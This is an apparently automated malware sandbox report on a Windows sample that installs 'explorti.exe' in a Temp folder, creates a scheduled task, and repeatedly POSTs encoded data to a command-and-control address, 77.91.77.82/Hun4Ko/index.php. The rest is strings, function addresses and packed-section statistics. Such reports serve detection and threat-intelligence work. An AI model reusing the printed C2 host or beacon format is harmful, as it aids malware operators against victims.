                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: Joe Sandbox ViewASN Name: FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_0017BD30 InternetOpenW,InternetConnectA,HttpSendRequestA,InternetReadFile,1_2_0017BD30
                      Source: unknownHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: explorti.exe, 00000001.00000003.2367240042.0000000000E27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php
                      Source: explorti.exe, 00000001.00000002.4137022991.0000000000E32000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000001.00000002.4137022991.0000000000E01000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000001.00000003.2367240042.0000000000E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php%
                      Source: explorti.exe, 00000001.00000003.2367240042.0000000000E27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php-e9c77b0923665da6f1
                      Source: explorti.exe, 00000001.00000002.4137022991.0000000000E01000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000001.00000003.2367240042.0000000000E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php
                      Source: explorti.exe, 00000001.00000003.2367240042.0000000000E27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php40971b6b
                      Source: explorti.exe, 00000001.00000003.2367240042.0000000000E27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php6
                      Source: explorti.exe, 00000001.00000002.4137022991.0000000000E01000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000001.00000003.2367240042.0000000000E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php;
                      Source: explorti.exe, 00000001.00000002.4137022991.0000000000E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpG
                      Source: explorti.exe, 00000001.00000003.2367240042.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpS
                      Source: explorti.exe, 00000001.00000003.2367240042.0000000000E27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpz

                      System Summary

                      barindex
                      PE file contains section with special chars
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name: .idata
                      Source: file.exeStatic PE information: section name:
                      Source: explorti.exe.0.drStatic PE information: section name:
                      Source: explorti.exe.0.drStatic PE information: section name: .idata
                      Source: explorti.exe.0.drStatic PE information: section name:
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_0017E4101_2_0017E410
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_001B30481_2_001B3048
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_00174CD01_2_00174CD0
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_001A7D631_2_001A7D63
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_001B763B1_2_001B763B
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_00174AD01_2_00174AD0
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_001B6EE91_2_001B6EE9
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_001B87001_2_001B8700
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_001B775B1_2_001B775B
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_001B2BB01_2_001B2BB0
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_001F8C2B2_1_001F8C2B
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_00285CAD2_1_00285CAD
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_002954A12_1_002954A1
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_00251A8D2_1_00251A8D
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_001FD56F2_1_001FD56F
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_001FFF632_1_001FFF63
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_002731BD2_1_002731BD
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_0028358C2_1_0028358C
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_002793C72_1_002793C7
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_0023C7D82_1_0023C7D8
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 9_1_001F8C2B9_1_001F8C2B
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 9_1_00285CAD9_1_00285CAD
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 9_1_002954A19_1_002954A1
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 9_1_00251A8D9_1_00251A8D
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 9_1_001FD56F9_1_001FD56F
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 9_1_001FFF639_1_001FFF63
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 9_1_002731BD9_1_002731BD
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 9_1_0028358C9_1_0028358C
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 9_1_002793C79_1_002793C7
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 9_1_0023C7D89_1_0023C7D8
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 11_1_001F8C2B11_1_001F8C2B
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 11_1_00285CAD11_1_00285CAD
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 11_1_002954A111_1_002954A1
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 11_1_00251A8D11_1_00251A8D
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 11_1_001FD56F11_1_001FD56F
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 11_1_001FFF6311_1_001FFF63
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 11_1_002731BD11_1_002731BD
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 11_1_0028358C11_1_0028358C
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 11_1_002793C711_1_002793C7
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 11_1_0023C7D811_1_0023C7D8
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: file.exeStatic PE information: Section: ZLIB complexity 0.9981375939207651
                      Source: file.exeStatic PE information: Section: vmjyxrbh ZLIB complexity 0.9947631725399939
                      Source: explorti.exe.0.drStatic PE information: Section: ZLIB complexity 0.9981375939207651
                      Source: explorti.exe.0.drStatic PE information: Section: vmjyxrbh ZLIB complexity 0.9947631725399939
